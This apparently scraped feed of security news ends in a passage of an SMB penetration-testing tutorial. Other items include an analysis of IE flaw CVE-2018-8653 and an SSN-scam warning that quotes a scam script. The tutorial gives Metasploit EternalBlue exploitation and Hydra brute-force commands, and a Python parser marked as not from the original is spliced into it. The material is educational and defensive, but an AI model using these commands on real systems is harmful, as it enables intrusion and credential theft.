Google notes will also be synchronized with Google Assistant.

Flight Check-Ins
The most awaited feature is flight check-in: with this addition, Google Assistant will help users check into their flights and access their boarding passes.
The Assistant will also send notifications about check-ins and related updates.
Command: “Hey Google, check into my flight.”

Newly Announced Devices
Google has also made some interesting announcements regarding the latest devices it is about to launch.
Brands like JBL, Anker, Whirlpool, and Verizon are employing Google Assistant in one way or another.
Sonos will also have the Assistant soon, starting with the Sonos Beam and Sonos One; older models will receive the Assistant via an update.
Smart displays, watches, cars and audio devices are a few of the devices that will gain the Assistant within a few weeks.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.


Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE-2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the two versions of jscript.dll for Windows 10, x64 edition (feature version 1809).

We can see that only a few functions were modified. All but one are array-related functions; those were probably patches addressing CVE-2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only remaining function that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code that the compiler had inlined into that function in the older version of the DLL.

In the newer version of the DLL, this function is called twice, while in the unpatched version the code ran only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to take the magic offset 0x3D0 and check whether this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually designate a template that keeps track of references pointing to an object in use, so that those objects are not garbage collected. Here it looks as though we are saving stack addresses (i.e. local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are held at those specific locations on the stack. In hindsight this makes sense: we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scenes. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), it invokes a virtual function that returns true/false depending on whether the object can be called. If the type is not 0x81, a different path is followed: the function tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:



Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.


CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

DNS Infrastructure Hijacking Campaign

Original release date: January 10, 2019 | Last revised: January 11, 2019

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization’s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization’s domain names, enabling man-in-the-middle attacks.

NCCIC encourages administrators to review the FireEye and Cisco Talos Intelligence blogs on global DNS infrastructure hijacking for more information. Additionally, NCCIC recommends the following best practices to help safeguard networks against this threat:

  • Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.
  • Verify that DNS infrastructure (second-level domains, sub-domains, and related resource records) points to the correct Internet Protocol addresses or hostnames.
  • Search for encryption certificates related to domains and revoke any fraudulently requested certificates.


Social Security Number scammers are at it again

The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourself with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat near the end of the automated recording, directed at those who aren’t motivated enough to call back the number it provides.


law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat from individuals or groups pretending to be from the Social Security Administration (SSA) is growing at an exponential rate. In fact, there was a 994 percent increase in SSN scams reported to the FTC—from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes targets more likely to accept the call) is the scammers’ use of technology to mimic the legitimate contact number of the Social Security Administration (SSA), so that it appears in the caller ID when they contact targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you have deliberately or accidentally answered a call that, at some point, you realize looks like a scam. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call SSA via their consumer service number and ask if they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remain untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: does it seem suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.

Canadian police block journalists from covering pipeline protest in British Columbia


The Royal Canadian Mounted Police are preventing journalists from covering members of the Wet’suwet’en First Nation’s opposition to the construction of a natural gas pipeline that would run through British Columbia.

Members of the Wet’suwet’en First Nation—including the hereditary leaders—began running checkpoints that block access to the planned construction site of the Coastal GasLink LNG pipeline, which would transport natural gas to the coast of British Columbia. Some members of the Wet’suwet’en First Nation are concerned that it could damage the watershed and threaten wildlife.

Indigenous opposition to the pipeline is an issue of huge public importance that has been covered by Canadian news outlets for years, including the CBC. But at Gidimt'en camp—one of the checkpoints restricting access without the consent of the hereditary leaders—Royal Canadian Mounted Police turned away numerous members of the press on Jan. 7. This included APTN News and a CBC TV crew from Vancouver.

APTN News reported that its reporters were informed by an officer that they were barred due to safety concerns, and if reporters tried to pass the checkpoint, they could be arrested and charged with obstruction.

Around the time that RCMP arrived at the checkpoint, several news outlets reported that the communication halted with journalists present at the camp. This reportedly included Jesse Winter and Perrin Grauer at The Star Vancouver, and the Twitter feeds of CBC reporter Chantelle Bellrichard and The Moose’s Sawyer Bogdan.

The Star deputy bureau chief Joanna Chiu tweeted that she had been informed that communications to the area had “been cut” due to a satellite issue. RCMP quickly denied that police had played any part in this lack of communications.

“It sounds like the RCMP is once again using every tactic that they can to bend the law as much as possible to prevent journalists from gaining access to sites,” said Tom Henheffer, vice president of Canadian Journalists for Free Expression (CJFE).

“This is a tactic that is very commonly employed and is very difficult to fight against in the moment because [police] know that when you’ve got a bunch of officers with guns telling people what they can and cannot do, it doesn’t necessarily matter whether the law is on the RCMP’s side or not – because it takes too long for a journalist to get a lawyer, go to court to get an order to allow them to get on to the site,” Henheffer said.

That same day, Jan. 7, RCMP arrested 14 people for allegedly violating a court injunction granting the pipeline company access. The RCMP also created a “temporary exclusion zone,” which made the area off limits to all but members of the enforcement team.

Pipeline protests can be dangerous for both protesters—who face risks of arrest and physical violence for their political expression—and the press, who are attacked and arrested in large numbers for doing their jobs highlighting it.

Particularly when arrests are being made, media coverage serves a critical function that can help ensure law enforcement does not use excessive force, and if they do, journalists will be there to document it.

Media coverage has been critical in illuminating law enforcement treatment of pipeline resistance protesters across the United States. At Standing Rock in North Dakota, pipeline security forces—both public and private—attacked protesters with dogs, rubber bullets, tear gas, mace, compression grenades, and beanbag rounds.

Reporters and livestreamers at Standing Rock quickly documented these tactics, which quickly gained mainstream media attention and faced intense public backlash. The United Nations' special rapporteur on the rights of freedom of association and peaceful assembly called out the violence against protesters opposing the pipeline, and denounced the arrest conditions as “inhuman and degrading.”

Solidarity rallies are being organized across Canada and the United States in support of the Wet’suwet’en nation members opposing the LNG pipeline.

"Authorities in Canada should immediately end the arbitrary restrictions on journalists covering the police breakup of the pipeline protest," said CPJ North America Program Coordinator Alexandra Ellerbeck. "Journalists should be able to freely cover events of national importance, without fear of arrest."

Free SuperCounters Widget Serves Unwanted Redirects to Dating Site


If we navigate way back into the recesses of our memory to the era of GeoCities websites and MySpace pages, we might distinctly recollect the popularity of the visitor-counting widget.

Commonly displayed on homepages across the web, these widgets served as credibility indicators to help site visitors identify the popularity of a website.

While this feature may have gone out of vogue with current website design trends and advanced analytics tools, these widgets also fell out of favor for bad behavior – from stealing traffic and redirecting visitors to planting trojans and malware.

Continue reading Free SuperCounters Widget Serves Unwanted Redirects to Dating Site at Sucuri Blog.

Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available

This post was cowritten by Jonathan Trull, Chief Security Advisor, Cybersecurity Solutions Group, and Sean Sweeney, Chief Security Advisor, Cybersecurity Solutions Group.

We’re excited to announce the availability of the Center for Internet Security’s (CIS) Microsoft 365 Foundations Benchmark, developed by CIS in partnership with Microsoft, to provide prescriptive guidance for establishing a secure baseline configuration for Microsoft 365. CIS is a nonprofit entity focused on developing global standards and recognized best practices for securing IT systems and data against the most pervasive attacks.

Microsoft 365 provides powerful online cloud services that enable collaboration, security, compliance, mobility, intelligence, and analytics. Adopting cloud technologies requires a shared responsibility model for security, with Microsoft responsible for certain controls and the customer responsible for others, depending on the service delivery model chosen. To ensure that a customer’s cloud workloads are protected, it is important that they carefully consider and implement the appropriate architecture and enable the right set of configuration settings.

The CIS Microsoft 365 Foundations Benchmark is designed to assist organizations in establishing the foundation level of security for anyone adopting Microsoft 365. The benchmark should not be considered as an exhaustive list of all possible security configurations and architecture but as a starting point. Each organization must still evaluate their specific situation, workloads, and compliance requirements and tailor their environment accordingly.

The CIS benchmark contains two levels, each with slightly different technical specifications:

  • Level 1: Recommended minimum security settings that should be configured on any system and should cause little or no interruption of service or reduced functionality.
  • Level 2: Recommended security settings for highly secure environments that could result in some reduced functionality.

The CIS Microsoft 365 Security Benchmark is divided into the following sections:

| Section | Description | # of recommended controls |
| --- | --- | --- |
| Account/Authentication policies | Recommendations related to setting the appropriate account and authentication policies. | 8 |
| Application permissions | Recommendations related to the configuration of application permissions within Microsoft 365. | 4 |
| Data management | Recommendations for setting data management policies. | 6 |
| Email security/Exchange Online | Recommendations related to the configuration of Exchange Online and email security. | 13 |
| Auditing policies | Recommendations for setting auditing policies on your Microsoft 365 tenant. | 14 |
| Storage policies | Recommendations for securely configuring storage policies. | 2 |
| Mobile device management | Recommendations for managing devices connecting to Microsoft 365. | 13 |
| Total recommendations | | 60 |

Each recommendation contains several sections, including a recommendation identification number, title, and description; level or profile applicability; rationale; instructions for auditing the control; remediation steps; impact of implementing the control; default value; and references. For example, the first control contained in the benchmark is under the Account/Authentication policies section and is titled: 1.1 (L1) Ensure multifactor authentication is enabled for all users in administrative roles (Scored).

A control is marked as Scored or Not Scored based on whether it can be programmatically tested. In this case, recommendation 1.1 can be audited using the Microsoft Graph and a PowerShell cmdlet. The specific steps for auditing the control are contained in the Audit section for that recommendation. This recommendation is listed as a Level 1 control because it applies only to Microsoft 365 administrative users and would not have a company-wide impact or reduce functionality for users. The rationale for recommendation 1.1 is that Microsoft 365 administrative accounts need to be protected because of their powerful privileges; with multifactor authentication, an attacker would need to compromise at least two different authentication mechanisms, increasing the difficulty of compromise and thus reducing the risk to the Azure tenant.

Download the benchmark and provide your feedback

The CIS Microsoft 365 Security Benchmark is freely available for download in PDF format on the CIS website. In the continuity of their mission, feedback provided by those entrenched in using and implementing the benchmarks provides us the opportunity for continuous improvement of our products. Feedback can be made visible to CIS by creating a discussion thread or ticket within the CIS Microsoft 365 Foundations Benchmark community. In addition, Microsoft has developed a set of Office 365 security guidelines and best practices for our customers to follow. These guides can be found in Office 365 Security and Compliance documentation.

The post Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available appeared first on Microsoft Secure.

Alert: phishing campaign against BBVA

The Oficina de Seguridad del Internauta has detected a campaign of fraudulent emails impersonating BBVA; its goal is to direct the victim to a fake page (phishing) that mimics the bank’s legitimate website in order to steal their login credentials. The emails detected in this new phishing campaign usually have […]

SMB Penetration Testing (Port 445)

In this article, we will learn how to gain control over our victim’s PC through the SMB port. There are various ways to do it, so let’s take the time to learn all of them, because different circumstances call for different measures.

Table of Contents

Introduction to SMB Protocol

  • Working of SMB
  • Versions of Windows SMB
  • SMB Protocol Security

SMB Enumeration

Scanning Vulnerability

Multiple Ways to Exploit SMB

  • Eternal Blue
  • SMB login via Brute Force
  • PSexec to connect SMB
  • Rundll32 One-liner to Exploit SMB
  • SMB Exploit via NTLM Capture

SMB DOS-Attack

Post Exploitation

File Sharing

  • smbserver
  • smbclient

Introduction to SMB Protocol

Server Message Block (SMB), one dialect of which was known as the Common Internet File System (CIFS), is an application-layer network protocol for file sharing that allows applications on a computer to read and write files and to request services from server programs on a network. SMB can run on top of TCP/IP or other network protocols. Using SMB, an application (or the user of an application) can access files or other resources on a remote server: it can read, create and update files there, and it can communicate with any server program that is set up to receive SMB client requests.

Working of SMB

SMB functions as a request-response, or client-server, protocol. The only time the protocol does not follow the request-response pattern is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the requested mode is incompatible with it. Client computers using SMB connect to a server using NetBIOS over TCP/IP, IPX/SPX or NetBEUI. Once the connection is established, the client computer or program can open, read, write and otherwise access files much as it would on a local file system.

Versions of Windows SMB

CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.

SMB 2.0 / SMB2: The version used in Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: The version used in Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: The version used in Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: The version used in Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: The version used in Windows Server 2016 and Windows 10.

Presently, the latest version of SMB is SMB 3.1.1, which was introduced with Windows 10 and Windows Server 2016. This version supports AES-128-GCM encryption in addition to the AES-128-CCM encryption added in SMB3, and implements a pre-authentication integrity check using a SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

SMB Protocol Security

The SMB protocol supports two levels of security. The first is share level: the server is protected at this level and each share has a password, which the client computer or user must supply to access the data or files saved under that share. This is the only security model available in the Core and Core Plus SMB protocol definitions. User-level protection was added to the SMB protocol later. It is applied to individual files, and each share is based on specific user access rights. Once the server authenticates a client, the client is given a unique identifier (UID) that it presents on each access to the server. SMB has supported user-level security since LAN Manager 1.0.

SMB Enumeration

Every pentester performs SMB enumeration during a network penetration test to identify the following information about a Windows or Samba system:

  • Banner Grabbing
  • RID cycling
  • User listing
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval

Here you can observe that we are using nmap, the best-known network scanning tool, for SMB enumeration.

nmap -p 445 -A

As a result, we enumerated the following information about the target machine:

Operating System: Windows 7 ultimate

Computer Name & NetBIOS Name: Raj

SMB security mode: SMB 2.02

Many automated scripts and tools are available for SMB enumeration; if you want to know more about it, read the article “A Little Guide to SMB Enumeration”.
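The version list and the “SMB security mode” line above both come from the SMB2 NEGOTIATE response a server sends on port 445. As an added defender-side example, not code from the original article or from nmap, the following Python parses such a response (field layout as documented in MS-SMB2), names the dialect the server agreed to and reports whether it requires message signing, the two things an auditor checks before deciding whether a file server needs hardening; the sample responses are constructed in the code rather than captured.

```python
import struct
from dataclasses import dataclass
from typing import List

# SMB2 dialect revision codes (MS-SMB2) for the versions listed above.
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}

# SecurityMode bits of the NEGOTIATE response (what nmap reports as "message signing").
SIGNING_ENABLED = 0x0001
SIGNING_REQUIRED = 0x0002
# Capabilities bit announcing SMB3 encryption support.
CAP_ENCRYPTION = 0x00000040

SMB2_HEADER_LEN = 64
SMB2_MAGIC = b"\xfeSMB"
SMB1_MAGIC = b"\xffSMB"


@dataclass
class NegotiateInfo:
    dialect: int
    dialect_name: str
    signing_enabled: bool
    signing_required: bool
    encryption_capable: bool

    def findings(self) -> List[str]:
        """Audit findings a defender would act on for this server."""
        out = []
        if not self.signing_required:
            out.append("message signing enabled but not required" if self.signing_enabled
                       else "message signing disabled")
        if self.dialect < 0x0300:
            out.append("dialect below SMB 3.0: encryption not available")
        return out


def parse_negotiate_response(data: bytes) -> NegotiateInfo:
    """Parse an SMB2 NEGOTIATE response (64-byte header plus body) captured on port 445.
    Raises ValueError for SMB1 replies (legacy protocol still enabled) or malformed input."""
    if len(data) < 4:
        raise ValueError("truncated packet")
    if data[:4] == SMB1_MAGIC:
        raise ValueError("server answered with SMB1 (legacy protocol enabled)")
    if data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    if len(data) < SMB2_HEADER_LEN + 28:
        raise ValueError("truncated NEGOTIATE response")
    # Header: StructureSize at offset 4 must be 64; Command at offset 12 is 0 for NEGOTIATE.
    (struct_size,) = struct.unpack_from("<H", data, 4)
    (command,) = struct.unpack_from("<H", data, 12)
    if struct_size != 64 or command != 0:
        raise ValueError("not a NEGOTIATE response")
    body = data[SMB2_HEADER_LEN:]
    # Body: StructureSize(2) SecurityMode(2) DialectRevision(2) NegotiateContextCount(2)
    #       ServerGuid(16) Capabilities(4) MaxTransactSize(4) MaxReadSize(4) MaxWriteSize(4) ...
    body_size, sec_mode, dialect, _ctx_count = struct.unpack_from("<HHHH", body, 0)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE body size")
    (capabilities,) = struct.unpack_from("<I", body, 24)
    return NegotiateInfo(
        dialect=dialect,
        dialect_name=DIALECTS.get(dialect, f"unknown (0x{dialect:04x})"),
        signing_enabled=bool(sec_mode & SIGNING_ENABLED),
        signing_required=bool(sec_mode & SIGNING_REQUIRED),
        encryption_capable=bool(capabilities & CAP_ENCRYPTION),
    )


def build_sample_response(dialect: int, security_mode: int, capabilities: int) -> bytes:
    """Constructed sample (not a real capture): a minimal NEGOTIATE response for offline testing."""
    # Header: StructureSize=64, CreditCharge, Status, Command=NEGOTIATE(0), CreditResponse=1,
    # Flags=SERVER_TO_REDIR, NextCommand, MessageId, Reserved, TreeId, SessionId, 16-byte Signature.
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 0x0001, 0, 0, 0, 0, 0)
    header += b"\x00" * 16
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0)
    body += b"\x11" * 16  # ServerGuid (constructed)
    body += struct.pack("<IIII", capabilities, 0x800000, 0x800000, 0x800000)  # caps, max sizes
    body += struct.pack("<QQ", 0, 0)  # SystemTime, ServerStartTime
    body += struct.pack("<HHI", 0, 0, 0)  # no security blob, no negotiate contexts
    return header + body


if __name__ == "__main__":
    # A Windows 7-style server (SMB 2.0.2, signing enabled but not required), as in the scan above,
    # beside a hardened SMB 3.1.1 server that requires signing and supports encryption.
    legacy = build_sample_response(0x0202, SIGNING_ENABLED, 0)
    hardened = build_sample_response(0x0311, SIGNING_ENABLED | SIGNING_REQUIRED, CAP_ENCRYPTION)
    for label, pkt in (("legacy", legacy), ("hardened", hardened)):
        info = parse_negotiate_response(pkt)
        print(label, info.dialect_name, info.findings() or ["no findings"])
```

On a live network the same parser can be fed the first server-to-client SMB2 packet from a capture file, which is how a blue team inventories servers that still accept unsigned sessions.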

Scanning Vulnerability

During the enumeration phase we generally grab banners to identify the version of the running service and the host operating system. Once you have enumerated that information, move on to the vulnerability scanning phase to determine whether the installed service is a vulnerable or a patched version.

Nmap provides scripts that check specific services for known vulnerabilities; it likewise has built-in scripts for SMB that report the vulnerable state of a given target IP.

nmap --script smb-vuln* -p 445

The result shows that the target machine is highly vulnerable to MS17-010 (EternalBlue) because SMBv1 is enabled.

To know more about MS17-010, read the complete article “3 Ways to Scan Eternal Blue Vulnerability in Remote PC”.

Multiple Ways to Exploit SMB

Eternal Blue

As we know the target is vulnerable to MS17-010, we can use Metasploit to exploit this machine. We therefore run the following module, which exploits the target machine directly.

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost
msf exploit(ms17_010_eternalblue) > exploit

Boomm!! We have successfully accessed the remote machine’s shell, as shown in the image below.

SMB login via Brute Force

If you fail to enumerate a vulnerable state of SMB, or find a patched version of SMB on the target machine, then we have “brute force” as another option for gaining unauthorized access to the remote machine.

Here we only need two dictionaries, one containing a list of usernames and one a list of passwords, and a brute-forcing tool to carry out the attack.

hydra -L user.txt -P pass.txt smb

-L –> denotes the path of the username list

-P –> denotes the path of the password list

Once the command runs it starts the dictionary attack, and you will have the right username and password in no time. After a few minutes Hydra cracks the credentials; as you can observe, we successfully obtained the SMB username raj and the password 123.

To know more about it, read the complete article here: “5 Ways to Hack SMB Login Password”.

If you have SMB login credentials, you can use the following module to determine which local users exist via the SAM RPC service.

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

PSexec – To Connect SMB

